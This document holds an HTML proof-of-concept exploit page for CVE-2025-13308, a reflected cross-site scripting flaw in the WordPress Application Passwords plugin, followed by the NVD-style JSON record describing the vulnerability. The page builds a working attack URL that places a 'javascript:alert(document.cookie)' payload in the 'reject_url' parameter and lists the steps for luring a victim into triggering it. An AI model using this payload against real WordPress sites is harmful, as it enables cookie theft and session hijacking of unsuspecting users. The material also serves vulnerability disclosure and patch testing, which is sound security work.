CVE-2025-13308

<!-- CVE-2025-13308 PoC - Reflected XSS in WordPress Application Passwords Plugin --> <!-- Target: WordPress site with Application Passwords plugin <= 0.1.3 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13308 PoC</title> </head> <body> <h2>CVE-2025-13308 - Reflected XSS PoC</h2> <p>Click the link below to trigger the XSS vulnerability:</p> <!-- Malicious URL construction --> <a id="malicious-link" href="#" target="_blank">Malicious Link</a> <script> // Construct the malicious URL // The vulnerable parameter is 'reject_url' in the Application Passwords flow const targetBase = window.location.origin + '/wp-admin/admin.php?page=application-passwords'; const maliciousPayload = 'javascript:alert(document.cookie)//'; const maliciousUrl = targetBase + '&reject_url=' + encodeURIComponent(maliciousPayload); document.getElementById('malicious-link').href = maliciousUrl; document.getElementById('malicious-link').textContent = maliciousUrl; console.log('PoC URL:', maliciousUrl); </script> <h3>Attack Scenario:</h3> <ol> <li>Attacker crafts a URL with javascript: payload in reject_url parameter</li> <li>Victim is tricked into clicking the malicious link</li> <li>Victim clicks "No, I do not approve of this connection" button</li> <li>Malicious JavaScript executes in victim's browser context</li> </ol> <h3>Real-world Attack URL Format:</h3> <pre id="real-url"></pre> <script> // Display example real attack URL const exampleUrl = 'https://target-wordpress-site.com/wp-admin/admin.php?page=application-passwords&reject_url=javascript:alert(document.cookie)'; document.getElementById('real-url').textContent = exampleUrl; </script> </body> </html>

{"cve": {"id": "CVE-2025-13308", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:51.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Application Passwords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'reject_url' parameter in all versions up to, and including, 0.1.3. This is due to insufficient input sanitization and output escaping on user supplied URLs, which allows javascript: URI schemes to be embedded in the reject_url parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when a user clicks the \"No, I do not approve of this connection\" button, granted they can successfully trick the victim into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/auth-app.js#L61", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L418", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L432", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/59fdfdf3-e9fe-44d2-82f4-7a612a51d376?source=cve", "source": "[email protected]"}]}}